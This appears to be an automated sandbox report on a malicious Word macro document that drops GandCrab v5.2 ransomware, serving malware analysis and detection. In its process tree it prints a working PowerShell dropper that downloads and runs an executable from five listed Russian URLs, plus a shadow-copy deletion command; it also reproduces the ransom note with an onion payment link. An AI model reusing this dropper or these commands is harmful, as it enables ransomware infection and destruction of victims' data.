Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 00:29

General

  • Target

    dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm

  • Size

    78KB

  • MD5

    fe2d1caa2d52000efcd19ea1ea31d254

  • SHA1

    6496aa6a299bc606ee9d058bdf4f0d826a2e4541

  • SHA256

    dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb

  • SHA512

    592a3447aa75b48b578b9f6b08524482b16c701f152b2fc2c074e63a9be84f250b380913b172e44af1dffbb0e223b6f17b959ac342b417fcbccadb3272b51f2d

Malware Config

Extracted

  • Language
    ps1

  • Deobfuscated

  • URLs (exe.dropper)
    https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
    http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
    https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
    http://sndtgo.ru/word.exe
    http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe

Extracted

  • Path
    C:\JQGGQ-MANUAL.txt

  • Family
    gandcrab

  • Ransom Note
    ---= GANDCRAB V5.2 =---
    ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
    *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
    Attention!
    All your files, documents, photos, databases and other important files are encrypted and have the extension: .JQGGQ
    The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.
    The server with your key is in a closed network TOR. You can get there by the following ways:
    ----------------------------------------------------------------------------------------
    | 0. Download Tor browser - https://www.torproject.org/
    | 1. Install Tor browser
    | 2. Open Tor Browser
    | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/4f6ecbe4c8a27fc9
    | 4. Follow the instructions on this page
    ----------------------------------------------------------------------------------------
    On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.
    ATTENTION!
    IN ORDER TO PREVENT DATA DAMAGE:
    * DO NOT MODIFY ENCRYPTED FILES
    * DO NOT CHANGE DATA BELOW
    ---BEGIN GANDCRAB KEY---
    [key data removed]
    ---END GANDCRAB KEY---
    ---BEGIN PC DATA---
    [PC data removed]
    ---END PC DATA---

  • URLs
    http://gandcrabmfe6mnef.onion/4f6ecbe4c8a27fc9

Signatures

  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 28 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1732
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:564
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:556
        • C:\windows\temp\229.exe
          "C:\windows\temp\229.exe"
          4⤵
          • Executes dropped EXE
          • Modifies extensions of user files
          • Drops startup file
          • Enumerates connected drives
          • Sets desktop wallpaper using registry
          • Drops file in Program Files directory
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1476
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1944
            • C:\Windows\SysWOW64\vssadmin.exe
              vssadmin delete shadows /all /quiet
              6⤵
              • Interacts with shadow copies
              PID:740
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1408
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x550
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1708
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1680

    MITRE ATT&CK Matrix (ATT&CK v6)

    • Defense Evasion
      File Deletion (2) T1107
      Modify Registry (2) T1112
    • Credential Access
      Credentials in Files (1) T1081
    • Discovery
      Query Registry (2) T1012
      Peripheral Device Discovery (1) T1120
      System Information Discovery (3) T1082
    • Collection
      Data from Local System (1) T1005
    • Impact
      Inhibit System Recovery (2) T1490
      Defacement (1) T1491

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
      Filesize

      4.0MB

      MD5

      b1cff93a5ffaa02a482145399dd2ca08

      SHA1

      2f6c2f98ab25544ac4141542e55db167a4b66cd4

      SHA256

      45130fa2ce44505b355def932b862ac2c4c64c760e8a62fe4fafa543caa6b99c

      SHA512

      a7e203a702b562ee40aaacacad43553e092c850c2fb3c4cc1020f2cc54236705636b55e4b876e11b5df676c2e6c9721fee31feccffca7f92ef4b128a81ce59e4

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
      Filesize

      37KB

      MD5

      4f13d08e827b2e667f511902c02da790

      SHA1

      fb951c9bc90b6ab09ff148ca590c61b108c4d9de

      SHA256

      8451b29eb14b901aa9d44fb7dbec865df4a2d6c75b05361ce556a9b99a1d09fb

      SHA512

      72d4ce0990b6f4e66f06e6a7addcaa95903774732f2cec999ffd1e38df683bc889b556f87e21d1c3aa9ab61d412ba4734fa768aea6b898718f66ed199de58b3c

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • C:\Windows\Temp\229.exe
      Filesize

      535KB

      MD5

      a76b7140cf6d5c4dc5e0ecff23fc2ce0

      SHA1

      b312fef877f8eae6ca473a969f30bc85d907f7e3

      SHA256

      3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972

      SHA512

      6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1

    • \Windows\Temp\229.exe
      Filesize

      535KB

      MD5

      a76b7140cf6d5c4dc5e0ecff23fc2ce0

      SHA1

      b312fef877f8eae6ca473a969f30bc85d907f7e3

      SHA256

      3a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972

      SHA512

      6a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1

    • memory/556-81-0x000000006A530000-0x000000006AADB000-memory.dmp
      Filesize

      5.7MB

    • memory/556-79-0x0000000004AA0000-0x0000000004BB4000-memory.dmp
      Filesize

      1.1MB

    • memory/556-76-0x0000000000000000-mapping.dmp
    • memory/564-75-0x0000000000000000-mapping.dmp
    • memory/740-92-0x0000000000000000-mapping.dmp
    • memory/1408-78-0x0000000000000000-mapping.dmp
    • memory/1408-80-0x000007FEFBAF1000-0x000007FEFBAF3000-memory.dmp
      Filesize

      8KB

    • memory/1476-87-0x00000000002B0000-0x00000000002D0000-memory.dmp
      Filesize

      128KB

    • memory/1476-83-0x0000000000000000-mapping.dmp
    • memory/1476-86-0x0000000000400000-0x000000000048D000-memory.dmp
      Filesize

      564KB

    • memory/1732-60-0x00000000007DB000-0x00000000007DF000-memory.dmp
      Filesize

      16KB

    • memory/1732-54-0x0000000072471000-0x0000000072474000-memory.dmp
      Filesize

      12KB

    • memory/1732-61-0x00000000007E7000-0x000000000084B000-memory.dmp
      Filesize

      400KB

    • memory/1732-59-0x00000000007DB000-0x00000000007DF000-memory.dmp
      Filesize

      16KB

    • memory/1732-62-0x00000000007E7000-0x000000000084B000-memory.dmp
      Filesize

      400KB

    • memory/1732-63-0x00000000007E7000-0x000000000084B000-memory.dmp
      Filesize

      400KB

    • memory/1732-58-0x0000000070EDD000-0x0000000070EE8000-memory.dmp
      Filesize

      44KB

    • memory/1732-57-0x00000000755C1000-0x00000000755C3000-memory.dmp
      Filesize

      8KB

    • memory/1732-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1732-55-0x000000006FEF1000-0x000000006FEF3000-memory.dmp
      Filesize

      8KB

    • memory/1944-91-0x0000000000000000-mapping.dmp